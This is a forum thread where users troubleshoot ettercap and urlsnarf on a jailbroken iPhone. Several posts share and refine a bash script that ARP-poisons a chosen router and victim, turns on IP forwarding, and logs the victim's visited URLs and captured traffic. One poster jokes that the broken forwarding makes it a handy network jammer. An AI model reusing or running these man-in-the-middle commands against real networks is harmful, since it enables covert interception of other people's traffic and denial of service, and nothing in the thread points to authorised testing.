ettercap-NG/GTK errors (answered [somewhat])

[C0deH4cker]

Oh i see it is just a warning, cool! Looks sexier than xwindow
Ettercap has to be run after you are in windowmakers xscreen...right click an empty spot and hit run then ettercap -G

Great success! Thanks again

Its because you didnt run window maker as a daemon. Put this in your etter.sh file:


export DISPLAY=127.0.0.1:0
wmaker &
ettercap -G

[kando]

Ah cheers! Ettercap still closes after you select interface en0 tho

also, if i try without GTK interface, running like

ettercap -T -i en0 -w /whatever.pcap -L /whatever -M arp

i get:

dyld: lazy symbol binding failed: Symbol not found:
iconv open

dyld: Symbol not found:  iconv open

[C0deH4cker]

Get iconv from repo

[A12danrulz]

Get iconv from repo

Yeah I'm getting same error as him and I've followed this thread to the letter. Iconv doesn't help with it closing.

[kando]

iconv was already installed, i tried reinstalling from your repo and same error when running ettercap...

strange thing is before i started installing stuff from your repo, the ettercap-ng that was out previously ran without this error, tho it did get a ton of SEND L3 ERROR: x byte packet (0800:x) destined to xxx.xxx.xxx.xxx was not forwarded (libnet_write_raw_ipv4() errors...

[A12danrulz]

You'll get those. They always have happened. Ignore them. Run it in quiet mode if you don't want to see them.

[kando]

ok if i install the non GTK version from your repo, the -T works fine as well, so the GTK version may be broken as it dies from iconv and the gui closes after choosing an interface. cheers

however, still get ONLY SEND L3 ERROR: x byte packet (0800:x) destined to xxx.xxx.xxx.xxx was not forwarded (libnet_write_raw_ipv4() errors. Not a single packet gets through.

*edit* alsoooo
this is my etter.sh for text version:

Code: [Select]

#!/bin/bash
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
mkdir /private/var/mobile/ettercap/
mkdir /private/var/mobile/ettercap/$SESSION/
echo "1" > /proc/sys/net/ipv4/ip_forward
urlsnarf -i en0 | grep http > /private/var/mobile/ettercap/$SESSION/$SESSION.txt &
ettercap -q -T -i en0 -w /private/var/mobile/ettercap/$SESSION/$SESSION.pcap -L /private/var/mobile/ettercap/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
killall urlsnarf
etterlog -p -i /private/var/mobile/ettercap/$SESSION/$SESSION.eci
notice the "echo "1" > /proc/sys/net/ipv4/ip_forward "
this does not work for iphone, is there an alternative we can use? basically no packets get fowarded at all and i effectively kill a network xD

*edit2*

ok googling helped me find this:

sysctl -w net.inet.ip.forwarding=1

but still no good.

modified code:

Code: [Select]

#!/bin/bash
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
mkdir /private/var/mobile/ettercap/
mkdir /private/var/mobile/ettercap/$SESSION/
sysctl -w net.inet.ip.forwarding=1
urlsnarf -i en0 | grep http > /private/var/mobile/ettercap/$SESSION/$SESSION.txt &
ettercap -q -T -i en0 -w /private/var/mobile/ettercap/$SESSION/$SESSION.pcap -L /private/var/mobile/ettercap/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
sysctl -w net.inet.ip.forwarding=0
killall urlsnarf
etterlog -p -i /private/var/mobile/ettercap/$SESSION/$SESSION.eci
first, i get SSL dissection needs a valid 'redir_command_on' script in the etter.conf file (i guess this is just a warning, not major)

but when its done blocking my packets and i hit 'q', it says:

Please restore manually the value of net.inet.ip.forwarding to 1
net.inet.ip.forwarding: 0 -> 0

so it is not being set? i tried adding a & at the end of the sysctrl line too, no difference.

[A12danrulz]

Any help Code?

[C0deH4cker]

Code: [Select]

#!/bin/bash
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
mkdir /private/var/mobile/ettercap/
mkdir /private/var/mobile/ettercap/$SESSION/
sysctl -w net.inet.ip.forwarding=1
urlsnarf -i en0 | grep http > /private/var/mobile/ettercap/$SESSION/$SESSION.txt &
ettercap -q -T -i en0 -w /private/var/mobile/ettercap/$SESSION/$SESSION.pcap -L /private/var/mobile/ettercap/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/ & sysctl -w net.inet.ip.forwarding=1
killall urlsnarf
etterlog -p -i /private/var/mobile/ettercap/$SESSION/$SESSION.eci
sysctl -w net.inet.ip.forwarding=0


Try that ^

[kando]

Sorry code, tried it; every packet still gets blocked and effectively kills my network. Not bad for a network jammer! xD

Has ANYONE had success with this? or actually getting past the interface screen on the GUI version? I just hope its not just me xD

dsniff was getting a libpcap error too (after sniffing is done), a little off topic but a fyi...is there a way to make an ECI file with dsniff? thats the reason i was using ettercap.

[A12danrulz]

Run ifconfig en0 promisc then sysctl -w net.inet.ip.forwarding=1 in a separate window before you start ettercap

[kando]

A12danrulz: i tried it by itself at command prompt and then ran my ettercap, and i also tried adding them into the sh file:

Code: [Select]

#!/bin/bash
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
mkdir /private/var/mobile/ettercap/
mkdir /private/var/mobile/ettercap/$SESSION/
ifconfig en0 promisc
sysctl -w net.inet.ip.forwarding=1
urlsnarf -i en0 | grep http > /private/var/mobile/ettercap/$SESSION/$SESSION.txt &
ettercap -T -q -i en0 -w /private/var/mobile/ettercap/$SESSION/$SESSION.pcap -L /private/var/mobile/ettercap/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
killall urlsnarf
etterlog -p -i /private/var/mobile/ettercap/$SESSION/$SESSION.eci
sysctl -w net.inet.ip.forwarding=0
(i removed the piping to sysctl because it makes ctrl-c and q unable to stop ettercap)

results: all i get is this:

Code: [Select]

SEND L3 ERROR: 78 byte packet (0800:11) destined to 192.168.1.3 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)
)
SEND L3 ERROR: 78 byte packet (0800:11) destined to 192.168.1.8 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)
)
SEND L3 ERROR: 78 byte packet (0800:11) destined to 192.168.1.5 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)
)
SEND L3 ERROR: 78 byte packet (0800:11) destined to 192.168.1.3 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)
)
Unified sniffing was stopped.


also: figuring out after hours and hours and days of typing on the iphone at the console to test code that you can ssh in? priceless. >.<

[A12danrulz]

No run it in a window on the xserver before you start sniffing.

[kando]

hm so i opened open 2 ssh sessions, one in command and one with windowmaker/xterm. in xterm i typed 'ifconfig en0 promisc' and then 'sysctl -w net.inet.ip.forwarding=1' and left the window open. from the second session i ran the script (minus the ifconfig en0 promisc line i added before) and...same results :[

[LankAsif]

Run ifconfig en0 promisc then sysctl -w net.inet.ip.forwarding=1 in a separate window before you start ettercap

I'm sure I remember Boo explaining to run that after ettercap is launched as ettercap closses the required function. As I remember it, you open ettercap, then open another shell and enter "ifconfig en0 then promisc" (or ifconfig en0 promisc) - sorry my memory is failing me - and run the command. Then return to ettercap shell and continue. Do you mind giving that a try? Hope it works. And the L3 errors have always been around, but oddly not for everyone. The packet forwarding issue is still not really understood and believe me it has been looked into a crap load.